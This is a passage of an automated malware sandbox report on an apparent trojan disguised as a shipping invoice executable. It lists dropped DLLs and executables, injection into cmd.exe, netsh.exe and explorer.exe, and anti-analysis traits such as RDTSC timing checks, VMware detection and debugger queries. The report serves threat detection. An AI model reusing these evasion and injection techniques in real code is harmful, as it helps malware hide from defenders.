          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\rcxdtiui.pdb source: rcxditui.dll.0.dr
          Source: Binary string: netsh.pdb source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
          Source: Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb$ source: MSBuildFramework.dll.0.dr
          Source: Binary string: netsh.pdbGCTL source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, netsh.exe, 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: cmd.exe, netsh.exe
          Source: Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb source: MSBuildFramework.dll.0.dr
          Source: Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdbQ" source: nse53A7.tmp.0.dr
          Source: Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\dbsvcui.pdb source: nse53A7.tmp.0.dr
          Source: Binary string: cmd.pdb source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
          Source: Binary string: MakeCert.pdb source: makecert.exe.0.dr
          Source: Binary string: guidgen.pdb source: guidgen.exe.0.dr
          Source: Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdb source: nse53A7.tmp.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_1000734B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,1_2_1000734B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_100046E5 push ecx; ret 1_2_100046F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041C952 push es; ret 2_2_0041C954
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B375 push eax; ret 2_2_0041B3C8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B3C2 push eax; ret 2_2_0041B3C8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B3CB push eax; ret 2_2_0041B432
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00409412 push ss; ret 2_2_00409415
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B42C push eax; ret 2_2_0041B432
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00414D93 push 5C0B9774h; iretd 2_2_00414DBA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00414EE9 push ebp; ret 2_2_00414F0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B8D0D1 push ecx; ret 2_2_04B8D0E4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0375D0D1 push ecx; ret 9_2_0375D0E4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B3C2 push eax; ret 9_2_02F7B3C8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B3CB push eax; ret 9_2_02F7B432
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B375 push eax; ret 9_2_02F7B3C8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7C952 push es; ret 9_2_02F7C954
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F74EE9 push ebp; ret 9_2_02F74F0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B42C push eax; ret 9_2_02F7B432
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F69412 push ss; ret 9_2_02F69415
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F74D93 push 5C0B9774h; iretd 9_2_02F74DBA
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exeJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\Prehnite.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exeJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          Overwrites code with unconditional jumps - possibly settings hooks in foreign process
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 00000000004085C4 second address: 00000000004085CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 000000000040894E second address: 0000000000408954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000002F685C4 second address: 0000000002F685CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000002F6894E second address: 0000000002F68954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00408880 rdtsc 2_2_00408880
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe
          Source: C:\Windows\SysWOW64\cmd.exe TID: 5796 Thread sleep time: -190000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6744 Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\netsh.exe TID: 2928 Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_00406469 FindFirstFileA,FindClose,0_2_00406469
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_00402765 FindFirstFileA,0_2_00402765
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040592E
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.709985267.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.923834797.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.701787722.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.710616810.000000000A9CC000.00000004.00000001.sdmp Binary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
          Source: explorer.exe, 00000004.00000000.710247999.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\rundll32.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00408880 rdtsc 2_2_00408880
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00409AF0 LdrLoadDll,2_2_00409AF0
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_10004CBC
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_1000734B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,1_2_1000734B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732AE4 mov eax, dword ptr fs:[00000030h]9_2_03732AE4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732ACB mov eax, dword ptr fs:[00000030h]9_2_03732ACB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371AAB0 mov eax, dword ptr fs:[00000030h]9_2_0371AAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371AAB0 mov eax, dword ptr fs:[00000030h]9_2_0371AAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373FAB0 mov eax, dword ptr fs:[00000030h]9_2_0373FAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]9_2_037052A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]9_2_037052A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]9_2_037052A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]9_2_037052A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]9_2_037052A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373D294 mov eax, dword ptr fs:[00000030h]9_2_0373D294
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373D294 mov eax, dword ptr fs:[00000030h]9_2_0373D294
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B171 mov eax, dword ptr fs:[00000030h]9_2_0370B171
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B171 mov eax, dword ptr fs:[00000030h]9_2_0370B171
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C962 mov eax, dword ptr fs:[00000030h]9_2_0370C962
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B944 mov eax, dword ptr fs:[00000030h]9_2_0372B944
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B944 mov eax, dword ptr fs:[00000030h]9_2_0372B944
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373513A mov eax, dword ptr fs:[00000030h]9_2_0373513A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373513A mov eax, dword ptr fs:[00000030h]9_2_0373513A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]9_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]9_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]9_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]9_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov ecx, dword ptr fs:[00000030h]9_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]9_2_03709100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]9_2_03709100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]9_2_03709100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037941E8 mov eax, dword ptr fs:[00000030h]9_2_037941E8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]9_2_0370B1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]9_2_0370B1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]9_2_0370B1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]9_2_037851BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]9_2_037851BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]9_2_037851BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]9_2_037851BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h]9_2_037361A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h]9_2_037361A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]9_2_037C49A4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]9_2_037C49A4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]9_2_037C49A4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]9_2_037C49A4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037869A6 mov eax, dword ptr fs:[00000030h]9_2_037869A6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732990 mov eax, dword ptr fs:[00000030h]9_2_03732990
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372C182 mov eax, dword ptr fs:[00000030h]9_2_0372C182
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A185 mov eax, dword ptr fs:[00000030h]9_2_0373A185
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D1074 mov eax, dword ptr fs:[00000030h]9_2_037D1074
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2073 mov eax, dword ptr fs:[00000030h]9_2_037C2073
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03720050 mov eax, dword ptr fs:[00000030h]9_2_03720050
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03720050 mov eax, dword ptr fs:[00000030h]9_2_03720050
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]9_2_0372A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]9_2_0372A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]9_2_0372A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]9_2_0372A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]9_2_0371B02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]9_2_0371B02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]9_2_0371B02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]9_2_0371B02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]9_2_0373002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]9_2_0373002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]9_2_0373002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]9_2_0373002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]9_2_0373002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h]9_2_037D4015
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h]9_2_037D4015
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]9_2_03787016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]9_2_03787016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]9_2_03787016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]9_2_037040E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]9_2_037040E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]9_2_037040E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h]9_2_0372B8E4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h]9_2_0372B8E4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037058EC mov eax, dword ptr fs:[00000030h]9_2_037058EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]9_2_0379B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov ecx, dword ptr fs:[00000030h]9_2_0379B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]9_2_0379B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]9_2_0379B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]9_2_0379B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]9_2_0379B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373F0BF mov ecx, dword ptr fs:[00000030h]9_2_0373F0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h]9_2_0373F0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h]9_2_0373F0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037490AF mov eax, dword ptr fs:[00000030h]9_2_037490AF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709080 mov eax, dword ptr fs:[00000030h]9_2_03709080
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03783884 mov eax, dword ptr fs:[00000030h]9_2_03783884
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03783884 mov eax, dword ptr fs:[00000030h]9_2_03783884
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371FF60 mov eax, dword ptr fs:[00000030h]9_2_0371FF60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8F6A mov eax, dword ptr fs:[00000030h]9_2_037D8F6A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371EF40 mov eax, dword ptr fs:[00000030h]9_2_0371EF40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373E730 mov eax, dword ptr fs:[00000030h]9_2_0373E730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h]9_2_0372B73D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h]9_2_0372B73D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h]9_2_03704F2E
